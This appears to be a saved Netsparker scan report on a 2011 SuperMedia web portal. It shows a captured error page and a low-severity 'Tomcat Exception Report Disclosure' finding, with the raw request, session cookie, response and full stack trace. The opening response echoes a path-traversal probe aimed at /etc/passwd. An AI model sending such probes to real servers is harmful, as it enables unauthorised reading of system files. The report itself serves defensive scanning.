No such flow definition with id &#039;../../../../../CANTBEHERE/../../../../../../etc/passwd&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer()..
Tomcat Exception Report Disclosure

Tomcat Exception Report Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing exception report data in the HTTP response.

Impact

An attacker can obtain information such as:
  • Tomcat version.
  • Physical file path of Tomcat files.
  • Information about the generated exception.
This information might help an attacker to gain more information and to potentially focus on the development of further attacks to the target system.

Remedy

Apply the following configuration to your web.xml file to prevent information leakage by applying custom error pages. 
<error-page>
        <error-code>500</error-code>
        <location>/server_error.html</location>
</error-page>

Remedy References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DC..

Parameters

Parameter Type Value
_flowExecutionKey GET _cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=&password=&&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:42 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 1642


<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>org.apache.jasper.JasperException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:460) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:373) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>root cause</b> <pre>org.springframework.beans.NullValueInNestedPathException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.springframework.beans.BeanWrapperImpl.getNestedBeanWrapper(BeanWrapperImpl.java:443) org.springframework.beans.BeanWrapperImpl.getBeanWrapperForPropertyPath(BeanWrapperImpl.java:418) org.springframework.beans.BeanWrapperImpl.getPropertyValue(BeanWrapperImpl.java:524) org.springframework.validation.AbstractPropertyBindingResult.getActualFieldValue(AbstractPropertyBindingResult.java:77) org.springframework.validation.AbstractBindingResult.getFieldValue(AbstractBindingResult.java:337) org.springframework.validation.BindException.getFieldValue(BindException.java:206) org.springframework.web.servlet.support.BindStatus.&lt;init&gt;(BindStatus.java:117) org.springframework.web.servlet.tags.BindTag.doStartTagInternal(BindTag.java:116) org.springframework.web.servlet.tags.RequestContextAwareTag.doStartTag(RequestContextAwareTag.java:77) org.apache.jsp.jsp.accountsetup_jsp._jspService(accountsetup_jsp.java:565) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:98) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:331) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.25 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>